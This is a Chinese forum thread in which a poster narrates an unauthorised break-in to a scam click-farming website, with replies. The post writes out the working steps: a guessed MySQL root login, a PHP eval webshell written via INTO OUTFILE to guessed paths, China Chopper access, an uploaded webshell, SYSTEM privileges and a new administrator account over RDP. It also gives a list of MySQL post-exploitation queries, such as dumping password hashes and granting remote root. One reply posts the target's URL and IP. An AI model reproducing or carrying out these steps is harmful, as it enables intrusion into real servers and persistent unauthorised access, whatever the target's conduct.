用户
搜索
  • TA的每日心情
    奋斗
    2017-8-25 08:53
  • 签到天数: 57 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋-核心白帽

    Rank: 4

    1

    主题

    128

    帖子

    486

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2016-1-17
    发表于 2017-5-4 21:57:47 3611061
    前段时间有看到过LOL小智的粉丝因为兼职刷单被骗的消息,下午比较闲,正好群里有骗子在发刷单的兼职,决定尝试搞一波。
    骗子发布兼职消息.jpg
    果断加骗子好友,首先发了一份工作流程介绍文章给我,让我了解下工作流程,然后让填一份入职申请表,想不到骗子还有这些入职流程,也难怪一些安全意识不高的朋友能够被骗。用假的身份填完之后,就开始刷单任务了,骗子发来了链接,获取到了目标地址,然后随便找个理由结束聊天。
    加好友.jpg
    获取到目标网站.jpg
    开始搞事.jpg
    刷单网站.jpg
    首先打开Awvs扫描器扫一波,发现网站无法访问了,网站安装了防火墙,封了我ip,骗子安全意识还挺高,换个ip继续。
    不能扫漏洞,扫下端口总可以吧,Nmap扫描发现开放了3306和3389。
    Awvs.jpg
    端口扫描.jpg
    端口开放.jpg
    尝试连接下数据库,账号:root,密码:****(网站域名),卧槽,竟然登录成功了,平静一下激动的心情。
    mysql连接.jpg
    数据库.jpg
    看了下注册用户信息,找了下管理员账号密码,但是没找到后台,尝试直接写入一句话木马,现在已经对用户信息不感冒了。写入一句话木马需要知道网站的绝对路径,现在只能靠猜了,首先
    select @@basedir;
    查看下数据库的安装路径:
    phpstudy.jpg
    发现网站管理员竟然是用的phpstudy搭建的网站,因为我最开始学渗透时就是使用phpstudy搭建的测试环境,所以有点喜出望外,赶紧准备写入一句话木马:
    select '<?php @eval($_POST["lzx"]);?>' into outfile 'C:/phpStudy/WWW/1.php';
    写入一句话失败.jpg
    没想到管理员并没有将网站放在phpstudy默认的WWW目录下,木马写入失败,于是开始各种尝试:
    select '<?php @eval($_POST["lzx"]);?>' into outfile 'C:/phpStudy/WWWROOT/1.php';
    select '<?php @eval($_POST["lzx"]);?>' into outfile 'D:/1.php';
    select '<?php @eval($_POST["lzx"]);?>' into outfile 'C:/www/1.php';
    ...
    最终还是让我找到了网站的绝对路径“C:/www/www.网站域名.com/”,成功写入一句话:
    写入成功.jpg
    菜刀连接之:
    菜刀连接.jpg
    上传大马:
    上传大马.jpg
    访问大马:
    访问大马.jpg
    获取系统system权限:
    获取到最高权限.jpg
    下一步就是添加管理员账号,3389远程桌面连接了,但是在大马中执行net命令报错,暂时还没有找到解决办法。入侵到此为止,后续找到突破办法之后再更新。

    总结一下:
    MySQL数据库拿到访问权之后的一些信息收集语句:
    显示版本:select version();
    显示字符集:select @@character_set_database;
    显示数据库show databases;
    显示表名:show tables;
    显示计算机名:select @@hostname;
    显示系统版本:select @@version_compile_os;
    显示mysql路径:select @@basedir;
    显示数据库路径:select @@datadir;
    显示root密码:select User,Password from mysql.user;
    开启外连:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

    与同事交流之后,原来是使用net命名添加管理员时,密码设置的过于简单,服务器又配置了密码策略,所以换个复杂点的密码就添加成功了。
    添加管理员.jpg
    远程连接.jpg
    虚拟机.jpg

    公子盛 发表于 2017-5-7 02:55
    楼主这码打的漂亮 菊花测漏

    要的就是这个效果,既保护了网站,有给你留了实验环境
    使用道具 举报 回复
    经过认真鉴定,网站地址:http://www.cspulun.com/k/
    116.62.65.61
    使用道具 举报 回复
    小爱_Joker 版主 成大事者 不拘小节 楚 积极活跃奖 i春秋签约作者 爱心勋章
    推荐
    发表于 2017-5-5 19:49:02
    .. ... 这运气  只能说运气不错 =-=
    使用道具 举报 回复
    那啥你是怎么连接到3306写入一句话的
    使用道具 举报 回复
    发表于 2017-5-5 23:39:59
    能不能用select cmdshell???然后3389进去??
    使用道具 举报 回复
    运气好的背后,隐藏了深厚 的社工的功底
    使用道具 举报 回复
    发表于 2017-5-5 10:07:56
    6
    使用道具 举报 回复
    66666
    使用道具 举报 回复
    发表于 2017-5-5 10:55:12
    666666
    使用道具 举报 回复
    发表于 2017-5-5 11:25:55
    运气不错
    我是坏蛋的小号
    使用道具 举报 回复
    发表于 2017-5-5 13:44:51
    楼主运气不错,猜的很准!
    使用道具 举报 回复
    发表于 2017-5-5 14:32:04
    这运气没谁了,
    使用道具 举报 回复
    发表于 2017-5-5 14:41:51
    这都猜到了。。。
    使用道具 举报 回复
    发表于 2017-5-5 14:46:12
    厉害厉害 看来很顺利 啊
    使用道具 举报 回复
    发表于 2017-5-5 14:57:45
    使用道具 举报 回复
    我来复现?
    使用道具 举报 回复
    发表于 2017-5-5 15:32:44
    全是网站域名的锅。。。
    使用道具 举报 回复
    6
    使用道具 举报 回复
    复现不了了  不用试了
    使用道具 举报 回复
    123下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册